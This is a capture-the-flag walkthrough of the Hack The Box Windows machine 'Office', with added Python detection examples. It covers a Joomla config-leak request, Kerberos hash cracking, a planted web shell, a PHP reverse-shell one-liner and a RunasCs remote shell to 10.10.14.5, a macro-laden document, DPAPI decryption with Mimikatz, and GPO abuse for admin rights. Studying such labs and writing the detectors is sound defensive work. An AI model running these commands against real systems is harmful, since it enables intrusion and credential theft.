HTB | Office
Last updated
This is a Windows box. You can find it here.
Joomla Web Service Abuse
CVE-2023-23752
Wireshark Packet Filtering
RunasCs
LibreOffice Registry Security
DPAPI
Abusing MS-BKRP (BackupKey Remote Protocol) for Password Decryption
GPO Abuse (via SharpGPOAbuse.exe)
IP: 10.10.11.3
From this output, we can see there are three hostnames:
office.htb
dc.office.htb
hostmaster.office.htb
Let's add these to /etc/hosts.
Let's try a zone transfer, but it is not allowed.
Nothing interesting was found with ldapsearch.
netexec confirms the hostname and domain.
We are not able to perform any unauthenticated enumeration.
Let's visit port 80.
Let's visit /robots.txt.
The website runs Joomla. We can find its version at http://office.htb/administrator/manifests/files/joomla.xml
It is version 4.2.7.
Let's look for an exploit.
I found CVE-2023-23752. According to the blog post, it is an authentication bypass that results in an information leak. We can trigger it with curl -v 'http://office.htb/api/index.php/v1/config/application?public=true'
or by visiting that URL in the browser.
From the response, we found the password H0lOgrams4reTakIng0Ver754!
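On the defender side of that same request, here is an added detection example (not part of the original writeup): it scans Apache access log lines, constructed for the example, for the config endpoint hit with public=true and for the version-disclosing manifest, and records whether each request actually succeeded.

```python
import re

# Constructed sample access log lines (Apache combined format);
# timestamps and byte counts are made up for this example.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Feb/2024:10:01:02 +0000] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 2211
10.10.14.5 - - [10/Feb/2024:10:01:30 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1537
10.10.14.9 - - [10/Feb/2024:10:02:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 120
192.168.1.4 - - [10/Feb/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Unauthenticated read of the site configuration (the CVE-2023-23752 request).
CONFIG_LEAK = re.compile(r"^/api/index\.php/v1/config/application(\?|$)", re.I)
PUBLIC_FLAG = re.compile(r"[?&]public=true(&|$)", re.I)
# Manifest that discloses the exact Joomla version (the recon step before it).
VERSION_PROBE = re.compile(r"^/administrator/manifests/files/joomla\.xml", re.I)

def find_joomla_api_abuse(lines):
    """One finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line
        path, status = m.group("path"), int(m.group("status"))
        if CONFIG_LEAK.match(path) and PUBLIC_FLAG.search(path):
            kind = "config_leak"
        elif VERSION_PROBE.match(path):
            kind = "version_probe"
        else:
            continue
        findings.append({
            "ip": m.group("ip"), "time": m.group("ts"), "kind": kind, "status": status,
            # a 2xx on the config endpoint means the configuration (and any
            # database password in it) actually left the server
            "succeeded": 200 <= status < 300,
        })
    return findings
```

A 403 on the config path is still worth keeping: it shows who is probing for the bug even after the site was patched or the endpoint blocked.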
That password did not work anywhere.
Since we have a password, let's use kerbrute to enumerate valid usernames.
Now that we have a username list and a password, we can password-spray.
There’s a hit on dwolfe. No matches on WinRM:
We found a pcap file in the SOC Analysis share.
I will download the file and open it in Wireshark for analysis.
Open Statistics -> Endpoints.
Looks like 10.250.0.0/24 is the internal network.
Most traffic is from 10.250.0.30.
Now let's analyse the conversations (Statistics -> Conversations). Here we can see a conversation between 10.250.0.41 and 10.250.0.30 over port 88, which is most likely Kerberos authentication.
We can see two AS-REQ requests from 10.250.0.41.
The first request has no pre-authentication data, but the second one does.
This packet includes a timestamp encrypted with a key derived from the tstark user's password.
I found this article, which shows how to get passwords from Kerberos pre-authentication packets.
I will now build the hash from the packet.
Now I will use hashcat to crack the hash.
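The Endpoints, Conversations and AS-REQ steps above, redone as an added triage script that is not part of the original writeup: it works over a tshark field export of the capture (the tshark command line and the Kerberos field names are assumed; the CSV rows are constructed, with the addresses mirroring the writeup) and lists which accounts' pre-authentication blobs a leaked pcap exposes, which is what a SOC needs in order to decide whose passwords to reset.

```python
import csv
from collections import Counter
from io import StringIO

# Constructed sample in the shape of a tshark field export, e.g.
#   tshark -r capture.pcap -T fields -E header=y -E separator=, -E occurrence=f \
#     -e ip.src -e ip.dst -e tcp.dstport -e kerberos.msg_type \
#     -e kerberos.CNameString -e kerberos.padata_type -e kerberos.etype
# Addresses mirror the writeup; the ports, user and etype values are made up.
SAMPLE_CSV = """\
ip.src,ip.dst,tcp.dstport,kerberos.msg_type,kerberos.CNameString,kerberos.padata_type,kerberos.etype
10.250.0.41,10.250.0.30,88,10,tstark,,
10.250.0.30,10.250.0.41,49812,30,,,
10.250.0.41,10.250.0.30,88,10,tstark,2,18
10.250.0.30,10.250.0.41,49812,11,tstark,,18
10.250.0.41,10.250.0.30,445,,,,
10.250.0.52,10.250.0.30,445,,,,
10.250.0.52,10.250.0.30,445,,,,
"""
AS_REQ, PA_ENC_TIMESTAMP = "10", "2"  # Kerberos msg-type and padata-type values

def load_rows(text):
    return list(csv.DictReader(StringIO(text)))

def endpoint_counts(rows):
    """Packets seen per address, the same view as Statistics -> Endpoints."""
    counts = Counter()
    for r in rows:
        counts[r["ip.src"]] += 1
        counts[r["ip.dst"]] += 1
    return counts

def conversations(rows, port="88"):
    """Client->server packet counts toward one port (Statistics -> Conversations, filtered)."""
    return Counter((r["ip.src"], r["ip.dst"]) for r in rows if r["tcp.dstport"] == port)

def preauth_exposure(rows):
    """AS-REQs carrying an encrypted timestamp. Whoever holds the capture can
    guess that user's password offline against this blob, so these are the
    accounts to reset when a pcap like this turns up on a file share."""
    hits = []
    for r in rows:
        if r["kerberos.msg_type"] == AS_REQ and r["kerberos.padata_type"] == PA_ENC_TIMESTAMP:
            hits.append({"client": r["ip.src"], "kdc": r["ip.dst"],
                         "user": r["kerberos.CNameString"], "etype": int(r["kerberos.etype"])})
    return hits
```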
This password only worked for SMB, but we didn't find anything on the shares.
This password worked on the Joomla website with the administrator username.
I’ll click on System and select “Site Templates”, and then “Cassiopeia Details and Files”. I’ll edit index.php, first changing a comment to make sure I have write permissions (I do).
Now I will add a web shell (see revshell.com) to index.php.
And it works.
I tried php -r '$sock=fsockopen("10.10.14.5",1234);system("sh<&3 >&3 2>&3");'
but the connection was closing as soon as it connected.
Now I'll try to get a shell as tstark directly, using RunasCs. I’ll host RunasCs on my Python web server and download it to C:\programdata:
We can verify that r.exe was copied.
I’ll send ?cmd=C:\programdata\r.exe tstark playboy69 cmd.exe -r 10.10.14.5:1234, and I get a shell:
We found user.txt.
Let's look at what privileges and groups the tstark user has.
Here we can see tstark is a member of the OFFICE\Registry Editors group.
That’s a custom group for Office, but it seems to imply that TStark can edit at least parts of the registry.
In C:\xampp\apache\conf\httpd.conf, I’ll find the virtual host configuration for this site:
The applications directory is empty, but it is owned by the PPotts user, and web_account has access to write to it:
Since port 8083 is only listening internally, I will upload chisel to the Office box.
And start the chisel server on my host. Now I’ll connect back:
Now I can visit http://127.0.0.1:8083.
There is a page, /resume.php, where we can upload a resume.
I tried uploading test.txt but got an error.
If I try with an allowed extension, it gets uploaded. Let's try test.odt.
This wiki page documents the MacroSecurityLevel registry key, which holds the current macro security setting:
According to that page, value 3 is Very High, so we have to lower it to 0.
The ACL on this registry key shows that "Registry Editors" has full control.
I'll update the value to 0.
I will use msfconsole to generate the .odt file.
Now I will run it and upload msf.odt to the website.
We have to check the MacroSecurityLevel value because it gets reset to 3 after some time.
After some time, we have a Meterpreter shell,
and we are ppotts.
cmdkey /list will show us any credentials saved on the system for the current account:
Here we can see a saved credential for user hhogan, and hhogan is a GPO Manager.
The saved credentials are protected by DPAPI and stored here:
The master keys for these are stored here:
The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.
Let's upload mimikatz to the box.
Now we have to recover the master key:
We have the key at the end of the output. Now let's try this key on all three credentials.
The first one is for MyUser.
The second is for hhogan.
And the third one gives an error.
Now we have hhogan's credentials. Let's use them over WinRM.
We can authenticate over SMB and WinRM with them.
Now use evil-winrm to get a shell.
Since hhogan is a GPO Manager, we can look for GPOs.
Now, to abuse a GPO we can use SharpGPOAbuse. I have downloaded the exe from this repo.
Let's upload the exe.
Let's start with the first GPO:
It is not writable. Let's try the second one:
We were able to abuse the second group policy, "Default Domain Policy", to add hhogan as a new local admin.
This doesn’t take effect until the GPO refreshes. HHogan has permission to run gpupdate /force, which will make that happen now:
Now hhogan is an administrator.
After reconnecting, I was able to get root.txt.
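The GPO change above leaves two artifacts a defender can alert on, and this added example (not from the writeup) checks both: a groupPolicyContainer modification in 5136-style directory-service events, here constructed records, and a Restricted Groups entry in the policy's GptTmpl.inf that pushes accounts into local Administrators, here a constructed excerpt. The Default Domain Policy GUID is its well-known value; svc_gpo, CONSTRUCTED-GUID-0001 and the sample SID are made up.

```python
import re

# Well-known GUID of the Default Domain Policy; edits to it are rare and high impact.
BUILTIN_GPOS = {"{31B2F340-016D-11D2-945F-00C04FB984F9}": "Default Domain Policy"}

# Constructed 5136-style records (field names as in the Windows event; svc_gpo and GUID-0001 are made up).
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "hhogan", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=office,DC=htb",
     "AttributeLDAPDisplayName": "versionNumber"},
    {"EventID": 5136, "SubjectUserName": "svc_gpo", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={CONSTRUCTED-GUID-0001},CN=Policies,CN=System,DC=office,DC=htb",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames"},
]
# Constructed GptTmpl.inf excerpt of the kind a Restricted Groups policy leaves in SYSVOL.
SAMPLE_GPTTMPL = """\
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = OFFICE\\hhogan,*S-1-5-21-1111-2222-3333-1105
"""

def flag_gpo_edits(events, approved_editors):
    """(who, gpo, attribute, reason) for each GPO container change worth a review."""
    approved = {a.lower() for a in approved_editors}
    flags = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("ObjectClass") != "groupPolicyContainer":
            continue  # not a GPO object change
        m = re.match(r"CN=(\{[^}]+\})", e["ObjectDN"], re.I)
        guid = m.group(1).upper() if m else "?"
        reasons = ["built-in GPO edited"] if guid in BUILTIN_GPOS else []
        if e["SubjectUserName"].lower() not in approved:
            reasons.append("editor not in approved list")
        if reasons:
            flags.append((e["SubjectUserName"], BUILTIN_GPOS.get(guid, guid),
                          e["AttributeLDAPDisplayName"], "; ".join(reasons)))
    return flags

def admins_pushed_by_gpttmpl(text):
    """Accounts a Restricted Groups entry adds to local Administrators (S-1-5-32-544); a leading * marks a SID."""
    in_section, members = False, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[group membership]"
        elif in_section and line.lower().startswith("*s-1-5-32-544__members"):
            members += [v.strip().lstrip("*") for v in line.partition("=")[2].split(",") if v.strip()]
    return members
```

Because hhogan legitimately sits in the GPO Managers group, the allow-list alone would not catch this; the built-in GPO check is what makes the Default Domain Policy edit stand out.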